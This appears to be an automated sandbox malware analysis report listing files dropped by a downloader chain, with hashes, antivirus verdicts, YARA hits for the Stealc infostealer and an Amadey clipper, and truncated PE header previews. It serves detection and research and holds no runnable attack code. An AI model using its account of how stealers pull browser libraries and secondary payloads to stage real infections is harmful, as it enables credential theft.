                                                                                                                                                                                                                                                  SHA-512:F80C0294D709CB0FAABAB3C5CDD6BAC6548175525C83BF0D3206FDB570CD572DE8876F7E2C4F00E6AB29EAE85F491E538CE5AC18B38FEDCED3F4F883DBCD1518
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Preview:[ {.. "description": "",.. "devtoolsFrontendUrl": "/devtools/inspector.html?ws=localhost:9229/devtools/page/3C560785989DDB8CEB66AC237CF984C3",.. "id": "3C560785989DDB8CEB66AC237CF984C3",.. "title": "Google Network Speech",.. "type": "background_page",.. "url": "chrome-extension://neajdppkdcdipfabeoofebfddakdcjhd/_generated_background_page.html",.. "webSocketDebuggerUrl": "ws://localhost:9229/devtools/page/3C560785989DDB8CEB66AC237CF984C3"..}, {.. "description": "",.. "devtoolsFrontendUrl": "/devtools/inspector.html?ws=localhost:9229/devtools/page/946D4270D28A389443B3C02767F88DA2",.. "id": "946D4270D28A389443B3C02767F88DA2",.. "title": "Google Hangouts",.. "type": "background_page",.. "url": "chrome-extension://nkeimhogjdpnpccoofpliimaahmaaome/background.html",.. "webSocketDebuggerUrl": "ws://localhost:9229/devtools/page/946D4270D28A389443B3C02767F88DA2"..}, {.. "description": "",.. "devtoolsFrontendUrl": "/devtools/inspector.html?ws=localhost:9229/devtoo

                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\json[2].json

                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\1010747001\0d261d49cf.exe
                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):1787
                                                                                                                                                                                                                                                  Entropy (8bit):5.370267285493508
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:48:SfNaoQEkZTEQEHfNaoQEQvfNaoQ9Q+wfNaoQf0UrU0U8QY:6NnQEkZTEQE/NnQEQHNnQ9Q+8NnQf0U3
                                                                                                                                                                                                                                                  MD5:6D8AD98BD05F7F2882AC6F7391D8BAB9
                                                                                                                                                                                                                                                  SHA1:2FBAC351DF61F6927CBC2857C877E1FB3A9F2C67
                                                                                                                                                                                                                                                  SHA-256:8CA78F7586A59034EEA61173E787409399EC85A7EE84CF31EF05594F931D0348
                                                                                                                                                                                                                                                  SHA-512:02ACBF917B01B717B8C976C6444BC2BC860985AAE309655096056321CFA896477B455BB70FCF82FF2E1804B65DBEE1C65C6456B2E96916000A576014F80A6BDE
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Preview:[ {.. "description": "",.. "devtoolsFrontendUrl": "/devtools/inspector.html?ws=localhost:9229/devtools/page/8797E5C7F024E28D6BBBC84A18845B98",.. "id": "8797E5C7F024E28D6BBBC84A18845B98",.. "title": "Google Network Speech",.. "type": "background_page",.. "url": "chrome-extension://neajdppkdcdipfabeoofebfddakdcjhd/_generated_background_page.html",.. "webSocketDebuggerUrl": "ws://localhost:9229/devtools/page/8797E5C7F024E28D6BBBC84A18845B98"..}, {.. "description": "",.. "devtoolsFrontendUrl": "/devtools/inspector.html?ws=localhost:9229/devtools/page/45F5D7FF8B649201FF5F259085E585BD",.. "id": "45F5D7FF8B649201FF5F259085E585BD",.. "title": "Google Hangouts",.. "type": "background_page",.. "url": "chrome-extension://nkeimhogjdpnpccoofpliimaahmaaome/background.html",.. "webSocketDebuggerUrl": "ws://localhost:9229/devtools/page/45F5D7FF8B649201FF5F259085E585BD"..}, {.. "description": "",.. "devtoolsFrontendUrl": "/devtools/inspector.html?ws=localhost:9229/devtoo

                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\legs[1].exe

                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                                                                                                                                                                                                  File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):776832
                                                                                                                                                                                                                                                  Entropy (8bit):7.8597230357066845
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:12288:smOcxtujRwuweJH9RKC6cmulcfJbBiv0W6NLtXmAuuweJH9RKC6cmulcfJbBiv0V:pG+XeJH9Rp6RtfNLtcXeJH9Rp6RtfNLr
                                                                                                                                                                                                                                                  MD5:75CF470500D65CE4411790E09E650806
                                                                                                                                                                                                                                                  SHA1:91ACA1838BC6E3868D25E44308F58124B749167D
                                                                                                                                                                                                                                                  SHA-256:F29A920DD390574C50DF03E8F909A8F81A1894AF912AF2D92A9BAF4B57CF1C04
                                                                                                                                                                                                                                                  SHA-512:1C281FE53742A338BECB9AA4EFD2A7E418A66949A7F3D156440E02E2351548F6FF0EAD5D93AAE157509F57D0B4CC3584A9AB623C6446EA389B45B49D0DF85C48
                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 96%
                                                                                                                                                                                                                                                  Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L.....`g..........".................RY............@.......................................@..................................7..<...............................@...........................X.......................(9..T............................text............................... ..`.rdata..$...........................@..@.data...l"...P.......>..............@....bsS....S............T.............. ..`.tls.................V..............@....rsrc................X..............@..@.reloc..@............Z..............@..B.bss.................t..............@....bss.........p......................@...................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe

                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                                                                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):4494336
                                                                                                                                                                                                                                                  Entropy (8bit):7.987910112110911
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:98304:QjXxyZzF5lVuN7/vL1fq+gQgv6VFHIYrMgiCO/IZFakE7c:QjXQjfVuxJi+gQgv4FB4giHwHa57
                                                                                                                                                                                                                                                  MD5:D6B0130E6CDD9D6FE53D0A4D23EA9CBD
                                                                                                                                                                                                                                                  SHA1:D35A79B64BB3BE4A14571BD00ECE5484BA8D6021
                                                                                                                                                                                                                                                  SHA-256:32B500200C202AB10AC18FA064B70FC7E6277DDCF3B927051FAE468B4C606A74
                                                                                                                                                                                                                                                  SHA-512:95332A22B4317B53476CA923E002D5E438F8F4DA623A44E65B0A6F355090D5D0FF2ECEB3E32499B2FFC4A1BAB1ABFC4EADACE88A47D82F1888DAF0D91E4CB8C9
                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....5rg...............(..M...w..2...P........M...@..................................KE...@... ............................._.t.s.....t...............w......2..............................X2...................................................... . ..t.......(.................@....rsrc.........t.......(.............@....idata ......t.......(.............@... ..9...t.......(.............@...hnsygimb.....p........(.............@...kduywxtx.....@.......lD.............@....taggant.0...P..."...rD.............@...........................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\client_jackbastadguy[1].exe

                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                                                                                                                                                                                                  File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):14379809
                                                                                                                                                                                                                                                  Entropy (8bit):7.995911957508085
                                                                                                                                                                                                                                                  Encrypted:true
                                                                                                                                                                                                                                                  SSDEEP:393216:+SatYLywq3Obs2CliL2Vmd6m+c/ei7G99EqRNiIAqHEzo:+SaiLywq3ObRqiyVmd8uFAv4s
                                                                                                                                                                                                                                                  MD5:E8A21B7C1DBF57E585F28C10631647CF
                                                                                                                                                                                                                                                  SHA1:6C987EE295375682DFC8156895099EB7D6840148
                                                                                                                                                                                                                                                  SHA-256:C04B0AF794F5CBDF4D3051D95F829AE20BD856BE754ECBC4ABD3372E8434DA75
                                                                                                                                                                                                                                                  SHA-512:A92F782D8C12B816D6019327EA41A0A3DC9AC7C316C91B2F1650FCC6343FEBB6439E24DC7DCF677D722CF7A3273B7B182BA7A34EC9C9F6C7FD6D1F34F4A06727
                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 5%
                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......t=.30\.`0\.`0\.`{$.a7\.`{$.a.\.`{$.a:\.` ..`3\.` ..a9\.` ..a!\.` ..a.\.`{$.a;\.`0\.`.\.`{..a)\.`{..a1\.`Rich0\.`........PE..d...d.wg.........."....).....l...... ..........@.........................................`.................................................4...x....p..h....@..8"..............d...................................@...@............................................text...p........................... ..`.rdata..(*.......,..................@..@.data....S..........................@....pdata..8"...@...$..................@..@.rsrc...h....p......................@..@.reloc..d...........................@..B........................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\random[1].exe

                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                                                                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):3277824
                                                                                                                                                                                                                                                  Entropy (8bit):6.665777492235047
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:98304:QJoGB5k1VSBgkTXgyGp0d3WUQ5Ts8wRWAQ2Pyd5t:QcPOhUTs8wRLA5t
                                                                                                                                                                                                                                                  MD5:97AF5B90F7A80FC9629DD3A0D3DC92A8
                                                                                                                                                                                                                                                  SHA1:E2E2303C04C1A06473CAE325C373B8A398A312F6
                                                                                                                                                                                                                                                  SHA-256:54851114E60D122332CE48525C5923D93232F58509FB3DFA292B7CE49D2D7315
                                                                                                                                                                                                                                                  SHA-512:586849599813A97C5A6E3832D82C5067BD508CA3291DB08D12B77F903ADBDC1CA99F0BFCAAD857BCF631A3CEE3CB6141A38CA37CFDF6EE75CB80B6DEF363951C
                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........-I..C...C...C...@...C...F.B.C.6.G...C.6.@...C.6.F...C...G...C...B...C...B.5.C.x.J...C.x.....C.x.A...C.Rich..C.........................PE..L....V.f..............................2...........@..........................@2.....".3...@.................................W...k.............................1...............................1..................................................... . ............................@....rsrc...............................@....idata ............................@...xsrqoxbv.P+......F+.................@...frrbcldo......2.......1.............@....taggant.0....2.."....1.............@...........................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\stealc_valenciga[1].exe

                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                                                                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):245760
                                                                                                                                                                                                                                                  Entropy (8bit):6.574504597316098
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:3072:skv0eu6ZJlctXwLISyqlsxfKPkAck1gD1l567pGDUJ42pUvp85lmv6RReHeP3Kqc:/MeNRFLIu5ckeHgFGD+jpUvwzzeot+
                                                                                                                                                                                                                                                  MD5:89AD45B4A0E2D547C1E09D0A1EA94DF6
                                                                                                                                                                                                                                                  SHA1:CA32C2E492BB6D0753AAB59993380DB79B080740
                                                                                                                                                                                                                                                  SHA-256:18F4E82898557BA7F23F5B58E181793AEE6B9EE066258CE0B8FDBA63A714C4F8
                                                                                                                                                                                                                                                  SHA-512:22C575D47780046D845E0C383BF02ADED47D2813173EA6F07180F8726BE42084336EF5009C34C5C8295D0DEDDB3F19F6E5FEE1902D62AC9499A117E7DE59C4FF
                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                  Yara Hits:
                                                                                                                                                                                                                                                  • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\stealc_valenciga[1].exe, Author: Joe Security
                                                                                                                                                                                                                                                  • Rule: infostealer_win_stealc_str_oct24, Description: Finds Stealc standalone samples (or dumps) based on the strings, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\stealc_valenciga[1].exe, Author: Sekoia.io
                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 100%
                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$....... ...d..d..d....s.|....F.i....r.^..m.[.g..m.K.b....g..d.......w.w....E.e..Richd..........PE..L.....jg.....................F"...................@...........................%...........@.................................Lf..<.............................$.|<...................................................................................text............................... ..`.rdata..............................@..@.data....+!..p.......V..............@....reloc...]....$..^...b..............@..B........................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\gold123[1].exe

                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                                                                                                                                                                                                  File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):926760
                                                                                                                                                                                                                                                  Entropy (8bit):7.729027880509905
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:24576:X5hXYUUk5Q5rd8NhhG5Qdard8NhhG5Qdct:X5BYUUke5eh84aeh840
                                                                                                                                                                                                                                                  MD5:122570B1D9D8FA848F3BFE02A1AB1A7B
                                                                                                                                                                                                                                                  SHA1:D85F70BEA3BCCBB453C7A896DCA4F4CEBD206A25
                                                                                                                                                                                                                                                  SHA-256:924A0DD594A393ED59780A22F8AEFF387ECF69DB54BA4505E8691F611D5445C3
                                                                                                                                                                                                                                                  SHA-512:02F42619F45A038A15AC8C31DF6D126CF654E3ED0D7601D77A2266D4692D33A9C69E3E46CC4AC0B2807991DE4759436EA34AEBC171CD7EE663988B4D500C8FBE
                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 83%
                                                                                                                                                                                                                                                  Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L.....og.................&...`.......n............@..........................`.......D....@.....................................<.......................(&......$'..................................8^..................p............................text...:$.......&.................. ..`.rdata.......@......................@..@.data....:...P...,...2..............@....tls.................^..............@....rsrc................`..............@..@.reloc..$'.......(...f..............@..B.bss................................@....bss.................F..............@...........................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\random[1].exe

                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                                                                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):1960448
                                                                                                                                                                                                                                                  Entropy (8bit):7.941066059618813
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:49152:lj7MqE7eEtF9gx8Od0qFSOdQvS5/3PAfgJ:htEyEhgx8N7ah4o
                                                                                                                                                                                                                                                  MD5:3D47CE3BB786721E47FC7C5FC4F3ECBE
                                                                                                                                                                                                                                                  SHA1:5F35D9FFF659166AFEB97185599B211FB344D772
                                                                                                                                                                                                                                                  SHA-256:C0743D1A2FBF9F2A9350AEF38169C6DA56B1A9C8ED08D0A35DABB7E29C7C19AC
                                                                                                                                                                                                                                                  SHA-512:E2658FE633DB0DEA8600458D3EABD3F3ED5B39B039C61E285401D0FC52EC0ED9076BFC59A63F86DEF5A132071CD94B21C3D48E4152A86EC1BED170126EF0824E
                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........i...........nG@.....ZR.....ZC.....ZU.................Z\.....ZB.....ZG....Rich...................PE..L....,.e.....................>....................@.........................................................................[.A.o.....@.....................................................D&...................................................... . ..@......N..................@....rsrc.........@..p...^..............@....idata ......A.....................@... ..*...A.....................@...jwcxmuyi......k.....................@...zcgagdls............................@....taggant.0......."..................@...........................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\am209[1].exe

                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                                                                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):439808
                                                                                                                                                                                                                                                  Entropy (8bit):6.48944055080441
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:6144:as9C0eaieHm71o2pL2IMJDoMc2ZNu5GQpsnp/yFPMsXnQODVNIg+cTtgJ7AO+Zj5:as9C0eaieHmO292D3//yFPMsXkJ7gmk
                                                                                                                                                                                                                                                  MD5:CE27255F0EF33CE6304E54D171E6547C
                                                                                                                                                                                                                                                  SHA1:E594C6743D869C852BF7A09E7FE8103B25949B6E
                                                                                                                                                                                                                                                  SHA-256:82C683A7F6E0B4A99A6D3AB519D539A3B0651953C7A71F5309B9D08E4DAA7C3C
                                                                                                                                                                                                                                                  SHA-512:96CFAFBAB9138517532621D0B5F3D4A529806CFDF6191C589E6FB6EBF471E9DF0777FB74E9ABBFE4E8CD8821944AD02B1F09775195E190EE8CA5D3FD151D20D9
                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                  Yara Hits:
                                                                                                                                                                                                                                                  • Rule: JoeSecurity_Amadey_3, Description: Yara detected Amadey\'s Clipper DLL, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\am209[1].exe, Author: Joe Security
                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 79%
                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........BS..,...,...,.../...,...).#.,..(...,../...,..)...,.......,...(...,...-...,...-.j.,.U.%...,.U.....,.U.....,.Rich..,.........PE..L...Q.-g.........................................@..........................0............@.................................@E...................................E......8...............................@...............<............................text............................... ..`.rdata..PH.......J..................@..@.data....m...`...,...B..............@....rsrc................n..............@..@.reloc...E.......F...p..............@..B........................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\freebl3[1].dll

                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\1008659001\stealc_valenciga.exe
                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):39936
                                                                                                                                                                                                                                                  Entropy (8bit):6.377344133144299
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:768:Wj5x+suTCQ/hiOU3dw9KdFBNC83W9jIVKKK3P6giPkBVOKM2ZHdZvl7dmmZ:MKTCQ/hiFSyC83WOkP6giKOKZZrp8K
                                                                                                                                                                                                                                                  MD5:F451E235D8BEB0D3E9D76099FAFFE38B
                                                                                                                                                                                                                                                  SHA1:30A69DAC80B3C9CC804B7F43DD36F9636CEABC17
                                                                                                                                                                                                                                                  SHA-256:A9DE4662043AE815647230088973C5BF19C155A808FB881D74D405222FFD73F5
                                                                                                                                                                                                                                                  SHA-512:9FA0A6D3E7DB8E5AD679D972AAEAABB2C63C50C25AF4655974C04D23BF461E52BA6F5BD1282324E8A12EDEB2199F14C0684426CFA3DBFDCBB584BF9FACD21160
                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                  Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........4......p.....................................................@A........................H...S...............x............F..P/.......#................................... ..................@............................text............................... ..`.rdata....... ......................@..@.data...<F...0......................@....00cfg..............................@..@.rsrc...x...........................@..@.reloc...#.......$..."..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\liddad[1].exe

                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                                                                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):7833736
                                                                                                                                                                                                                                                  Entropy (8bit):5.960896721758829
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:49152:vB6DGAe6ei93Aq7SrSLAFiyRMrqcHy/e8TRDh2lGcsl6BS/W7hlRSfYKRbpxPyzt:vB7m939hAMuM2cS/h1F2xDSqbKJyz82
                                                                                                                                                                                                                                                  MD5:66178E76829F947721EE5F995434D37F
                                                                                                                                                                                                                                                  SHA1:D4FF72A893EB3A70A8D3274289F014D338EBB249
                                                                                                                                                                                                                                                  SHA-256:4AA772539C101EEEA6CD0FECECAE92603738C59AFB7406D7B81B370313918F93
                                                                                                                                                                                                                                                  SHA-512:0C39CDE1DB094B22CCA8B3087DC5629C89D4F0EE3D9FEA89A9A6E57A4B6C1080C552830F6D53BF347D3B4E81DE047384365F8065561EF35D70A2D85047AFD5C2
                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 45%
                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....5rg...............(..M..~w..2............M...@...........................x.....;.x...@... ..............................`t..-....................w.......t..K............................s......................ht. ............................text.....M.......M.................`..`.data.........M.......M.............@....rdata........^.......^.............@..@.eh_framdM....s..N....s.............@..@.bss.....1... t..........................idata...-...`t.......t.............@....CRT....0.....t......2t.............@....tls..........t......4t.............@....reloc...K....t..L...6t.............@..B........................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\mozglue[1].dll

                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\1008659001\stealc_valenciga.exe
                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):608080
                                                                                                                                                                                                                                                  Entropy (8bit):6.833616094889818
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:12288:BlSyAom/gcRKMdRm4wFkRHuyG4RRGJVDjMk/x21R8gY/r:BKgcRKMdRm4wFkVVDGJVv//x21R8br
                                                                                                                                                                                                                                                  MD5:C8FD9BE83BC728CC04BEFFAFC2907FE9
                                                                                                                                                                                                                                                  SHA1:95AB9F701E0024CEDFBD312BCFE4E726744C4F2E
                                                                                                                                                                                                                                                  SHA-256:BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
                                                                                                                                                                                                                                                  SHA-512:FBB446F4A27EF510E616CAAD52945D6C9CC1FD063812C41947E579EC2B54DF57C6DC46237DED80FCA5847F38CBE1747A6C66A13E2C8C19C664A72BE35EB8B040
                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                  Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........^......................................................j.....@A.........................`...W.....,.... ..................P/...0...A...S..............................h.......................Z.......................text...a........................... ..`.rdata..............................@..@.data...D...........................@....00cfg..............................@..@.tls................................@....rsrc........ ......................@..@.reloc...A...0...B..................@..B................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\msvcp140[1].dll

                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\1008659001\stealc_valenciga.exe
                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):450024
                                                                                                                                                                                                                                                  Entropy (8bit):6.673992339875127
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:12288:McPa9C9VbL+3Omy5CvyOvzeOKdqhUgiW6QR7t5s03Ooc8dHkC2esGAWf:McPa90Vbky5CvyUeOKn03Ooc8dHkC2eN
                                                                                                                                                                                                                                                  MD5:5FF1FCA37C466D6723EC67BE93B51442
                                                                                                                                                                                                                                                  SHA1:34CC4E158092083B13D67D6D2BC9E57B798A303B
                                                                                                                                                                                                                                                  SHA-256:5136A49A682AC8D7F1CE71B211DE8688FCE42ED57210AF087A8E2DBC8A934062
                                                                                                                                                                                                                                                  SHA-512:4802EF62630C521D83A1D333969593FB00C9B38F82B4D07F70FBD21F495FEA9B3F67676064573D2C71C42BC6F701992989742213501B16087BB6110E337C7546
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1C.._..._..._.)n...._......._...^."._..^..._..\..._..[..._..Z..._.._..._......_..]..._.Rich.._.........................PE..L.....0].........."!.....(..........`........@......................................,.....@A.........................g.......r...........................A.......=..`x..8............................w..@............p.......c..@....................text....&.......(.................. ..`.data...H)...@.......,..............@....idata.......p.......D..............@..@.didat..4............X..............@....rsrc................Z..............@..@.reloc...=.......>...^..............@..B................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\nss3[1].dll

                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\1008659001\stealc_valenciga.exe
                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):2046288
                                                                                                                                                                                                                                                  Entropy (8bit):6.787733948558952
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:49152:fECf12gikHlnKGxJRIB+y5nvxnaOSJ3HFNWYrVvE4CQsgzMmQfTU1NrWmy4KoAzh:J7Tf8J1Q+SS5/nr
                                                                                                                                                                                                                                                  MD5:1CC453CDF74F31E4D913FF9C10ACDDE2
                                                                                                                                                                                                                                                  SHA1:6E85EAE544D6E965F15FA5C39700FA7202F3AAFE
